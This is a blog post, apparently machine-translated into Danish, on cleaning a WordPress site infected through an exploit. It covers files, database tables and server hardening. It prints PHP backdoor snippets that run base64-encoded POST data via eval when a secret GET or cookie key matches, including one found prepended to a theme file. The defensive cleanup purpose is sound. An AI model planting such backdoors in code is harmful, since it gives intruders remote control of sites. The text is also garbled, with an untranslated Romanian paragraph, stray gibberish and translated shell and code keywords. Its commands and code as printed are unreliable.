Før du læser dette indlæg, skal du se Indlægget her, at forstå noget. )
Jeg fandt i flere filer af blogs på stealthsetts.com, koder, der ligner dem nedenfor, som optrådte som et resultat af virus med Exploitul de WordPress.:
<? php if ($ _ get [‘573ABCB060974771’] ==”8e96d1b4b674e1d2″) {eval (base64_decode ($ _ post [‘fil’])); udgang; }?>
og
<? php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘fil’])); udgang; }?>
I ovenstående tilfælde handler det om filen xmlrpc.php af Søvnig, men på en Grep På serveren kan du se, at der er en hel del koder af sin art i kilder.
Rengøring af inficerede filer:
Oookkkkyouak
1. Cea mai buna solutie, dupa ce este facut Backup-ul si curatata baza de date, este sa Slet fisierele de WordPress (puteti pastra wp-config.php si fisierele care nu tin strict de platforma wp, dupa ce sunt atent verificate) de pe server si sa faceti upload la cele originale din versiunea 2.5.1 (cu ocazia asta faceti si un upgrade de versiune wp :) ): http://wordpress.org/download/ . Stergeti inclusiv fisierele temei, daca nu aveti incredere ca puteti face o verificare atenta a lor.
Se vede ca au fost afectate si fisiere ale temelor care nu au fost folosite niciodata pe blog si simpla schimbare a temei, nu rezolva aceasta problema.
./andreea/wp-content/themes/default/index.php:<? php if ($ _ cookie ['44e827f9fbeca184′] ==”5CD3C94B4B1C57EA”) {eval (base64_decode ($ _ post [‘fil’])); udgang; }?><?php get_header(); ?>
2. Søg og slet alle filer, der indeholder: *_new.php, *_old.php, *.jpgg, *.giff, *.pngg og wp-info.txt-fil, hvis nogen.
Find. -navn “*_New.php”
Find. -navn “*_old.php”
Find. -navn “*.jpgg”
Find. -navn “* _giff”
Find. -navn “*_pngg”
Find. -navn “wp-info.txt”
3. i /TMP , søg og slet mapper som tmpywbzt2
SQL -rengøring :
1. i tabellen WP_OPTIONS Se om du findes og sletter linjerne: INTERN_LINKS_CACHE, RIS_F541B3ABD05E7962FCAB37737F40FAD8 og WordPress_Options.
2. gå også i WP_Options, gå til Active_plugins Og slet, hvis det findes, et plugin, der ender i en af udvidelserne *_new.php, *_old.php, *.jpgg, *.giff, *.pngg, eller hvis det er en anden mistænksom udvidelse, skal du kontrollere omhyggeligt.
3. i tabellen WP_USERS, se om der er en bruger, der ikke har noget at skrive ved siden af ham, på søjlen user_nicename. Slet denne bruger, men opbevar nummeret på ID -kolonnen. Denne bruger er mulig at bruge "WordPress" som user_login Og det ser ud til at være oprettet på 00:00 0000-00-00.
4. Gå til bordet WP_Usermeta og slet alle de linjer, der hører til ID'et ovenfor.
Når du har gjort denne rengøring af SQL, deaktiveres og aktiverer derefter noget plugin. (i blog -> Dashboard -> Plugins)
Serversikring:
1. Se hvilke mapper og filer der er ”skrivbar"(Chmod 777) og prøv at sætte dem på dem Chmod hvilket ikke længere giver dem mulighed for at skrive fra noget niveau. (For eksempel Chmod 644)
Find. -perm -2 –LS
2. Se hvilke filer der har indstillet biten syd eller skøjte . Hvis du ikke bruger de filer på dem Chmod 0 eller afinstallere den pakke, der indeholder. De er meget farlige, fordi de optræder med privilegierne ”gruppe"Eller"rod"Og ikke med privilegierne for den normale bruger, der udfører den fil.
Find / -type f -perm -04000 -LS
Find / -type f -perm -02000 -LS
3. Kontroller, hvilke porte der er åbne, og prøv at lukke eller sikre dem, der ikke bruges.
Netstat -an | GRIP -I LISTE
Det handler om det. Jeg ser det Nogle blogs er forbudt Af Google Search og andre siger "Nå gjorde dem !!!" . De ville have gjort dem ... men hvad siger du, hvis Google begynder at penge Alle sider Hvem gør SE spam og trojanere (Trojan.clicker.html) i cookies?
1 Tænkte på “WordPress udnyttelse – Rengøringsvirusfiler, SQL og serversikkerhed.”